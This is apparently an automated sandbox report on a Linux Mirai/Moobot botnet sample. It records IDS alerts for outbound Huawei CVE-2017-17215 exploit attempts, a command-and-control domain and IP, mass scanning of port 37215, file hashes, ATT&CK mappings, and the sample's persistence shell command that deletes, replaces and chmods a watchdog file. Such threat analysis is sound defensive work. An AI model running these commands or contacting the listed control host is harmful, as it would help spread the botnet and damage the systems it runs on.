          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32976 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59410 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39134 -> 37215

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path InterceptionPath Interception2
          File and Directory Permissions Modification          		1
          OS Credential Dumping          		System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Scripting          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830724 Sample: XHZFo8hExw.elf Startdate: 20/03/2023 Architecture: LINUX Score: 96 25 kamuiv3.hopto.org 2->25 27 41.188.184.88 simbanet-tzTZ Tanzania United Republic of 2->27 29 99 other IPs or domains 2->29 31 Snort IDS alert for network traffic 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 5 other signatures 2->37 8 XHZFo8hExw.elf 2->8         started        signatures3 process4 process5 10 XHZFo8hExw.elf sh 8->10         started        12 XHZFo8hExw.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 XHZFo8hExw.elf 12->21         started        23 XHZFo8hExw.elf 12->23         started        signatures7 39 Sets full permissions to files and/or directories 14->39

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          XHZFo8hExw.elf59%ReversingLabsLinux.Trojan.Mirai
          XHZFo8hExw.elf100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          kamuiv3.hopto.org
          		103.161.181.97
          		truetrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/soap/encoding/XHZFo8hExw.elffalse
              		high
              http://schemas.xmlsoap.org/soap/envelope/XHZFo8hExw.elffalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                157.222.253.14
                		unknownUnited States
                		4704SANNETRakutenMobileIncJPfalse
                123.2.106.131
                		unknownAustralia
                		38285VOCUS-RETAIL-AUVocusRetailAUfalse
                197.252.128.188
                		unknownSudan
                		15706SudatelSDfalse
                157.248.240.207
                		unknownUnited States
                		32934FACEBOOKUSfalse
                69.13.83.61
                		unknownUnited States
                		54489CORESPACE-DALUSfalse
                197.21.53.58
                		unknownTunisia
                		37693TUNISIANATNfalse
                41.239.14.56
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                41.29.92.236
                		unknownSouth Africa
                		29975VODACOM-ZAfalse
                197.22.223.233
                		unknownTunisia
                		37693TUNISIANATNfalse
                197.211.30.86
                		unknownKenya
                		15399WANANCHI-KEfalse
                157.64.218.80
                		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                136.136.78.96
                		unknownUnited States
                		60311ONEFMCHfalse
                103.79.96.223
                		unknownIndonesia
                		64308IDNIC-DATAON-AS-IDPTIndoDevNiagaInternetIDfalse
                45.92.107.116
                		unknownUnited Kingdom
                		208485EKSENBILISIMTRfalse
                157.85.134.11
                		unknownAustralia
                		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                157.219.235.195
                		unknownUnited States
                		4704SANNETRakutenMobileIncJPfalse
                197.166.154.65
                		unknownEgypt
                		24863LINKdotNET-ASEGfalse
                178.130.158.179
                		unknownPalestinian Territory Occupied
                		51407MADA-ASPSfalse
                157.20.68.147
                		unknownunknown
                		24297FCNUniversityPublicCorporationOsakaJPfalse
                157.222.253.161
                		unknownUnited States
                		4704SANNETRakutenMobileIncJPfalse
                177.213.86.27
                		unknownBrazil
                		26599TELEFONICABRASILSABRfalse
                197.21.90.14
                		unknownTunisia
                		37693TUNISIANATNfalse
                175.176.224.75
                		unknownHong Kong
                		9229SPEEDCAST-APSPEEDCASTLimitedHKfalse
                197.78.176.195
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                157.67.71.116
                		unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                157.247.205.7
                		unknownAustria
                		8447TELEKOM-ATA1TelekomAustriaAGATfalse
                197.169.172.171
                		unknownSouth Africa
                		37168CELL-CZAfalse
                20.215.158.192
                		unknownUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                197.89.123.84
                		unknownSouth Africa
                		10474OPTINETZAfalse
                157.175.218.249
                		unknownUnited States
                		16509AMAZON-02USfalse
                62.224.13.74
                		unknownGermany
                		3320DTAGInternetserviceprovideroperationsDEfalse
                157.242.3.106
                		unknownUnited States
                		25789LMUUSfalse
                41.60.37.66
                		unknownMauritius
                		30969ZOL-ASGBfalse
                157.125.18.12
                		unknownSweden
                		31655ASN-GAMMATELECOMGBfalse
                157.135.242.106
                		unknownUnited States
                		600OARNET-ASUSfalse
                197.211.114.49
                		unknownMalawi
                		37187SKYBANDMWfalse
                197.64.175.149
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                197.226.252.37
                		unknownMauritius
                		23889MauritiusTelecomMUfalse
                41.19.78.128
                		unknownSouth Africa
                		29975VODACOM-ZAfalse
                197.37.162.226
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                205.36.77.137
                		unknownUnited States
                		2914NTT-COMMUNICATIONS-2914USfalse
                102.224.168.208
                		unknownunknown
                		36926CKL1-ASNKEfalse
                157.14.236.67
                		unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                19.16.45.213
                		unknownUnited States
                		3MIT-GATEWAYSUSfalse
                41.44.233.222
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                126.240.235.65
                		unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                41.38.222.243
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                157.98.43.171
                		unknownUnited States
                		3527NIH-NETUSfalse
                41.141.72.150
                		unknownMorocco
                		36903MT-MPLSMAfalse
                41.230.50.120
                		unknownTunisia
                		37705TOPNETTNfalse
                41.122.225.65
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                197.18.83.242
                		unknownTunisia
                		37693TUNISIANATNfalse
                197.165.20.92
                		unknownEgypt
                		24863LINKdotNET-ASEGfalse
                157.187.69.254
                		unknownUnited States
                		668DNIC-AS-00668USfalse
                41.43.219.135
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                41.188.184.88
                		unknownTanzania United Republic of
                		37084simbanet-tzTZfalse
                41.195.197.32
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                197.4.200.59
                		unknownTunisia
                		5438ATI-TNfalse
                157.14.224.90
                		unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                197.251.50.141
                		unknownSudan
                		37197SUDRENSDfalse
                177.244.235.199
                		unknownMexico
                		13999MegaCableSAdeCVMXfalse
                157.74.40.98
                		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                17.199.135.173
                		unknownUnited States
                		714APPLE-ENGINEERINGUSfalse
                208.115.146.123
                		unknownUnited States
                		17385ORBITELUSfalse
                52.195.214.237
                		unknownUnited States
                		16509AMAZON-02USfalse
                157.107.251.195
                		unknownJapan4685ASAHI-NETAsahiNetJPfalse
                157.87.159.74
                		unknownUnited States
                		21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                41.225.230.125
                		unknownTunisia
                		37671GLOBALNET-ASTNfalse
                53.212.253.138
                		unknownGermany
                		31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                197.89.196.43
                		unknownSouth Africa
                		10474OPTINETZAfalse
                122.137.112.239
                		unknownChina
                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                100.172.140.117
                		unknownUnited States
                		21928T-MOBILE-AS21928USfalse
                197.206.228.129
                		unknownAlgeria
                		36947ALGTEL-ASDZfalse
                157.163.181.143
                		unknownGermany
                		22192SSHENETUSfalse
                41.55.86.135
                		unknownSouth Africa
                		37168CELL-CZAfalse
                41.145.167.174
                		unknownSouth Africa
                		5713SAIX-NETZAfalse
                125.215.76.137
                		unknownJapan7522STCNSTNetIncorporatedJPfalse
                197.235.69.37
                		unknownMozambique
                		37223VODACOM-MZfalse
                197.77.89.52
                		unknownSouth Africa
                		16637MTNNS-ASZAfalse
                157.75.1.57
                		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                157.245.211.186
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUSfalse
                142.237.203.2
                		unknownCanada
                		32347PRAN-ASNCAfalse
                135.89.221.28
                		unknownUnited States
                		10455LUCENT-CIOUSfalse
                157.76.253.214
                		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                197.49.160.167
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                197.30.202.42
                		unknownTunisia
                		37492ORANGE-TNfalse
                89.2.156.164
                		unknownFrance
                		21502ASN-NUMERICABLEFRfalse
                197.36.184.199
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                197.32.129.131
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                157.77.13.122
                		unknownJapan4678FINECanonITSolutionsIncJPfalse
                62.182.140.55
                		unknownRussian Federation
                		29497KUBANGSMRUfalse
                64.242.55.75
                		unknownUnited States
                		3561CENTURYLINK-LEGACY-SAVVISUSfalse
                157.215.239.34
                		unknownUnited States
                		4704SANNETRakutenMobileIncJPfalse
                201.123.86.80
                		unknownMexico
                		8151UninetSAdeCVMXfalse
                197.179.217.80
                		unknownKenya
                		33771SAFARICOM-LIMITEDKEfalse
                41.204.140.219
                		unknownTanzania United Republic of
                		36930Zantel-ASTZfalse
                41.239.63.43
                		unknownEgypt
                		8452TE-ASTE-ASEGfalse
                97.251.204.235
                		unknownUnited States
                		6167CELLCO-PARTUSfalse
                197.206.175.64
                		unknownAlgeria
                		36947ALGTEL-ASDZfalse
                41.193.123.107
                		unknownSouth Africa
                		11845Vox-TelecomZAfalse

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.508652600152545
                TrID:
                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                File name:XHZFo8hExw.elf
                File size:58448
                MD5:f90025024613f3a9d54373f3cc68eefd
                SHA1:b44c167b326ff981979a38c1086cebe9d27feb66
                SHA256:d502542baec72142eef5bbe366c81681acaca46c920c37c724d2cd0b8a93a223
                SHA512:84c3505f1361c7907bd3533254ab0a8054365e7e7313205e97b7ae9ff5e209fd217dfb02e0876c91ed7de9beb116c89c4121eb5ee1fc3301459a38a13e6028e5
                SSDEEP:1536:ka4CVvtTO8yJT/0fSGUPk+nU61TH6V/Ps06r6M3:d4CxtTO8yd/0KGUs+n31Ta9k0JA
                TLSH:43434BC4F647E8F5DC5706741036EB778B32F5FA2218D743D3A99A32AC92601E617A8C
                File Content Preview:.ELF....................d...4...........4. ...(.....................\...\....................`...`......H(..........Q.td............................U..S.......w....h....s...[]...$.............U......=.b...t..5....$`.....$`......u........t....h\]..........

                Static ELF Info

                ELF header

                Class:
                Data:
                Version:
                Machine:
                Version Number:
                Type:
                OS/ABI:
                ABI Version:
                Entry Point Address:
                Flags:
                ELF Header Size:
                Program Header Offset:
                Program Header Size:
                Number of Program Headers:
                Section Header Offset:
                Section Header Size:
                Number of Section Headers:
                Header String Table Index:

                Sections

                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80480940x940x1c0x00x6AX001
                .textPROGBITS0x80480b00xb00xbc960x00x6AX0016
                .finiPROGBITS0x8053d460xbd460x170x00x6AX001
                .rodataPROGBITS0x8053d600xbd600x1ffc0x00x2A0032
                .ctorsPROGBITS0x80560000xe0000x80x00x3WA004
                .dtorsPROGBITS0x80560080xe0080x80x00x3WA004
                .dataPROGBITS0x80560200xe0200x2600x00x3WA0032
                .bssNOBITS0x80562800xe2800x25c80x00x3WA0032
                .shstrtabSTRTAB0x00xe2800x3e0x00x0001

                Program Segments

                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80480000x80480000xdd5c0xdd5c6.58950x5R E0x1000.init .text .fini .rodata
                LOAD0xe0000x80560000x80560000x2800x28483.45680x6RW 0x1000.ctors .dtors .data .bss
                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.23103.161.181.9751628569992030490 03/20/23-16:35:53.346108TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)5162856999192.168.2.23103.161.181.97
                192.168.2.23156.224.11.11456256372152835222 03/20/23-16:36:47.049175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625637215192.168.2.23156.224.11.114
                192.168.2.2341.237.5.20140986372152835222 03/20/23-16:36:24.420831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098637215192.168.2.2341.237.5.201
                192.168.2.23157.122.72.6939570372152835222 03/20/23-16:36:24.331963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957037215192.168.2.23157.122.72.69
                192.168.2.2341.36.233.7039590372152835222 03/20/23-16:37:00.531602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959037215192.168.2.2341.36.233.70
                192.168.2.23147.46.79.13732976372152835222 03/20/23-16:37:21.136876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297637215192.168.2.23147.46.79.137
                103.161.181.97192.168.2.2356999516282030489 03/20/23-16:37:52.298836TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699951628103.161.181.97192.168.2.23
                192.168.2.23197.39.68.9839574372152835222 03/20/23-16:36:06.532616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957437215192.168.2.23197.39.68.98
                192.168.2.2341.237.5.20140988372152835222 03/20/23-16:36:24.422131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098837215192.168.2.2341.237.5.201
                192.168.2.23154.38.241.21259410372152835222 03/20/23-16:36:58.418193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941037215192.168.2.23154.38.241.212
                192.168.2.23197.39.56.4557594372152835222 03/20/23-16:37:32.803566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759437215192.168.2.23197.39.56.45
                192.168.2.2327.0.158.18046574372152835222 03/20/23-16:36:00.398384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4657437215192.168.2.2327.0.158.180
                192.168.2.2341.239.113.3144976372152835222 03/20/23-16:36:12.950349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497637215192.168.2.2341.239.113.31
                192.168.2.23163.15.165.2239134372152835222 03/20/23-16:37:53.743391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913437215192.168.2.23163.15.165.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Mar 20, 2023 16:35:53.150180101 CET4442437215192.168.2.2336.220.195.163
                Mar 20, 2023 16:35:53.150198936 CET4442437215192.168.2.2341.24.32.207
                Mar 20, 2023 16:35:53.150228024 CET4442437215192.168.2.23190.198.11.63
                Mar 20, 2023 16:35:53.150249004 CET4442437215192.168.2.2341.242.39.224
                Mar 20, 2023 16:35:53.150252104 CET4442437215192.168.2.23157.26.87.133
                Mar 20, 2023 16:35:53.150264978 CET4442437215192.168.2.23197.89.169.68
                Mar 20, 2023 16:35:53.150278091 CET4442437215192.168.2.2376.99.245.93
                Mar 20, 2023 16:35:53.150290012 CET4442437215192.168.2.2341.198.201.62
                Mar 20, 2023 16:35:53.150302887 CET4442437215192.168.2.23156.103.226.156
                Mar 20, 2023 16:35:53.150329113 CET4442437215192.168.2.23183.62.90.136
                Mar 20, 2023 16:35:53.152451992 CET4442437215192.168.2.23149.119.186.237
                Mar 20, 2023 16:35:53.152471066 CET4442437215192.168.2.23157.5.2.18
                Mar 20, 2023 16:35:53.152544975 CET4442437215192.168.2.2341.152.184.159
                Mar 20, 2023 16:35:53.152549028 CET4442437215192.168.2.23157.216.108.241
                Mar 20, 2023 16:35:53.152587891 CET4442437215192.168.2.23125.33.207.14
                Mar 20, 2023 16:35:53.152627945 CET4442437215192.168.2.23115.9.59.221
                Mar 20, 2023 16:35:53.152627945 CET4442437215192.168.2.23157.134.14.1
                Mar 20, 2023 16:35:53.152642965 CET4442437215192.168.2.2360.74.64.111
                Mar 20, 2023 16:35:53.152657032 CET4442437215192.168.2.23157.40.121.156
                Mar 20, 2023 16:35:53.152663946 CET4442437215192.168.2.23197.8.63.16
                Mar 20, 2023 16:35:53.152673006 CET4442437215192.168.2.23132.111.249.4
                Mar 20, 2023 16:35:53.152681112 CET4442437215192.168.2.23197.32.54.151
                Mar 20, 2023 16:35:53.152745962 CET4442437215192.168.2.2369.175.58.192
                Mar 20, 2023 16:35:53.152774096 CET4442437215192.168.2.23185.247.192.134
                Mar 20, 2023 16:35:53.152781963 CET4442437215192.168.2.2341.17.139.34
                Mar 20, 2023 16:35:53.152787924 CET4442437215192.168.2.23184.200.42.7
                Mar 20, 2023 16:35:53.152792931 CET4442437215192.168.2.23157.143.186.196
                Mar 20, 2023 16:35:53.152792931 CET4442437215192.168.2.23197.162.212.232
                Mar 20, 2023 16:35:53.152796984 CET4442437215192.168.2.23157.226.249.173
                Mar 20, 2023 16:35:53.152808905 CET4442437215192.168.2.2341.204.245.74
                Mar 20, 2023 16:35:53.152833939 CET4442437215192.168.2.2341.204.127.28
                Mar 20, 2023 16:35:53.152848959 CET4442437215192.168.2.2341.68.219.4
                Mar 20, 2023 16:35:53.152857065 CET4442437215192.168.2.23197.162.131.20
                Mar 20, 2023 16:35:53.152880907 CET4442437215192.168.2.23167.130.212.255
                Mar 20, 2023 16:35:53.152904987 CET4442437215192.168.2.23143.207.8.71
                Mar 20, 2023 16:35:53.152919054 CET4442437215192.168.2.23157.215.34.222
                Mar 20, 2023 16:35:53.152940035 CET4442437215192.168.2.23219.76.204.174
                Mar 20, 2023 16:35:53.152961016 CET4442437215192.168.2.23157.189.119.55
                Mar 20, 2023 16:35:53.152992010 CET4442437215192.168.2.2341.59.192.2
                Mar 20, 2023 16:35:53.153000116 CET4442437215192.168.2.23197.117.162.83
                Mar 20, 2023 16:35:53.153011084 CET4442437215192.168.2.2343.179.170.100
                Mar 20, 2023 16:35:53.153011084 CET4442437215192.168.2.2341.19.49.16
                Mar 20, 2023 16:35:53.153038979 CET4442437215192.168.2.2350.189.204.48
                Mar 20, 2023 16:35:53.153729916 CET4442437215192.168.2.23157.46.249.106
                Mar 20, 2023 16:35:53.153757095 CET4442437215192.168.2.2341.128.130.208
                Mar 20, 2023 16:35:53.153795004 CET4442437215192.168.2.23142.0.83.204
                Mar 20, 2023 16:35:53.153800964 CET4442437215192.168.2.23197.223.83.218
                Mar 20, 2023 16:35:53.153810978 CET4442437215192.168.2.2371.250.85.3
                Mar 20, 2023 16:35:53.153816938 CET4442437215192.168.2.23197.28.70.32
                Mar 20, 2023 16:35:53.153844118 CET4442437215192.168.2.2341.177.52.245
                Mar 20, 2023 16:35:53.153845072 CET4442437215192.168.2.2341.5.148.203
                Mar 20, 2023 16:35:53.153861046 CET4442437215192.168.2.23157.170.134.72
                Mar 20, 2023 16:35:53.153882027 CET4442437215192.168.2.23157.136.33.26
                Mar 20, 2023 16:35:53.153882980 CET4442437215192.168.2.23197.137.17.77
                Mar 20, 2023 16:35:53.153903961 CET4442437215192.168.2.23157.72.253.69
                Mar 20, 2023 16:35:53.153908014 CET4442437215192.168.2.23157.225.39.203
                Mar 20, 2023 16:35:53.153944969 CET4442437215192.168.2.2341.84.167.150
                Mar 20, 2023 16:35:53.153945923 CET4442437215192.168.2.23197.195.74.165
                Mar 20, 2023 16:35:53.153956890 CET4442437215192.168.2.23157.204.192.43
                Mar 20, 2023 16:35:53.153975010 CET4442437215192.168.2.23197.192.68.113
                Mar 20, 2023 16:35:53.153975964 CET4442437215192.168.2.23164.71.49.123
                Mar 20, 2023 16:35:53.153986931 CET4442437215192.168.2.23204.226.7.122
                Mar 20, 2023 16:35:53.154040098 CET4442437215192.168.2.23144.98.214.22
                Mar 20, 2023 16:35:53.154041052 CET4442437215192.168.2.2319.10.183.121
                Mar 20, 2023 16:35:53.154046059 CET4442437215192.168.2.23117.213.230.167
                Mar 20, 2023 16:35:53.154088974 CET4442437215192.168.2.23197.102.113.130
                Mar 20, 2023 16:35:53.154100895 CET4442437215192.168.2.23157.157.138.157
                Mar 20, 2023 16:35:53.154123068 CET4442437215192.168.2.2341.21.220.106
                Mar 20, 2023 16:35:53.154128075 CET4442437215192.168.2.23197.197.113.4
                Mar 20, 2023 16:35:53.154158115 CET4442437215192.168.2.23197.238.46.81
                Mar 20, 2023 16:35:53.154172897 CET4442437215192.168.2.2341.51.243.179
                Mar 20, 2023 16:35:53.154197931 CET4442437215192.168.2.2341.125.3.112
                Mar 20, 2023 16:35:53.154211044 CET4442437215192.168.2.23197.0.109.131
                Mar 20, 2023 16:35:53.154211998 CET4442437215192.168.2.23157.141.123.234
                Mar 20, 2023 16:35:53.154225111 CET4442437215192.168.2.2341.77.98.79
                Mar 20, 2023 16:35:53.154239893 CET4442437215192.168.2.23197.7.38.32
                Mar 20, 2023 16:35:53.154247999 CET4442437215192.168.2.2349.141.117.135
                Mar 20, 2023 16:35:53.154269934 CET4442437215192.168.2.2319.148.67.117
                Mar 20, 2023 16:35:53.154280901 CET4442437215192.168.2.23109.89.200.67
                Mar 20, 2023 16:35:53.154304981 CET4442437215192.168.2.23157.183.228.147
                Mar 20, 2023 16:35:53.154305935 CET4442437215192.168.2.23157.66.234.192
                Mar 20, 2023 16:35:53.154357910 CET4442437215192.168.2.23197.22.232.35
                Mar 20, 2023 16:35:53.154376030 CET4442437215192.168.2.23157.12.32.247
                Mar 20, 2023 16:35:53.154383898 CET4442437215192.168.2.2341.17.241.221
                Mar 20, 2023 16:35:53.154383898 CET4442437215192.168.2.23205.128.148.108
                Mar 20, 2023 16:35:53.154407024 CET4442437215192.168.2.23197.170.101.167
                Mar 20, 2023 16:35:53.154419899 CET4442437215192.168.2.23197.171.146.72
                Mar 20, 2023 16:35:53.154437065 CET4442437215192.168.2.23157.230.164.175
                Mar 20, 2023 16:35:53.154443979 CET4442437215192.168.2.2341.247.197.138
                Mar 20, 2023 16:35:53.154470921 CET4442437215192.168.2.23157.103.204.147
                Mar 20, 2023 16:35:53.154500008 CET4442437215192.168.2.23197.11.252.161
                Mar 20, 2023 16:35:53.154500008 CET4442437215192.168.2.23197.183.89.54
                Mar 20, 2023 16:35:53.154514074 CET4442437215192.168.2.23157.93.13.52
                Mar 20, 2023 16:35:53.154586077 CET4442437215192.168.2.2383.176.101.52
                Mar 20, 2023 16:35:53.154588938 CET4442437215192.168.2.23157.197.198.32
                Mar 20, 2023 16:35:53.154592991 CET4442437215192.168.2.2341.80.99.22
                Mar 20, 2023 16:35:53.154613018 CET4442437215192.168.2.23157.16.86.219
                Mar 20, 2023 16:35:53.154627085 CET4442437215192.168.2.23157.231.95.100
                Mar 20, 2023 16:35:53.154643059 CET4442437215192.168.2.23145.112.234.110
                Mar 20, 2023 16:35:53.154652119 CET4442437215192.168.2.23197.231.13.110

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 20, 2023 16:35:53.149841070 CET192.168.2.238.8.8.80xb6e9Standard query (0)kamuiv3.hopto.orgA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 20, 2023 16:35:53.170298100 CET8.8.8.8192.168.2.230xb6e9No error (0)kamuiv3.hopto.org103.161.181.97A (IP address)IN (0x0001)false

                System Behavior

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:/tmp/XHZFo8hExw.elf
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/rm
                Arguments:rm -rf bin/watchdog
                File size:72056 bytes
                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/mkdir
                Arguments:mkdir bin
                File size:88408 bytes
                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/bin/sh
                Arguments:n/a
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/usr/bin/chmod
                Arguments:chmod 777 bin/watchdog
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
